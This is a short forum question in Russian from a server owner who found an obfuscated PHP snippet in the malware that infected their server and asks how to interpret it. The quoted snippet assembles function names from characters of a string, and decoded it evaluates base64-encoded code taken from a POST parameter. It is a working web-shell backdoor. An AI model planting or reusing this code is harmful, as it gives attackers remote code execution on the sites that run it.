Недавно был атакован мой сервер, и я пытался исследовать, как и почему это происходит.
Я нашел очень похожий шаблон в файлах вирусов, который выглядит примерно так: насколько я могу сказать, что он пытается запустить определенный файл?
Кто-нибудь видел что-то подобное, и как мне его интерпретировать? Это просто захват отдельных символов на основе строки $sF
?
<?php
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
eval($s21($s22));
}?>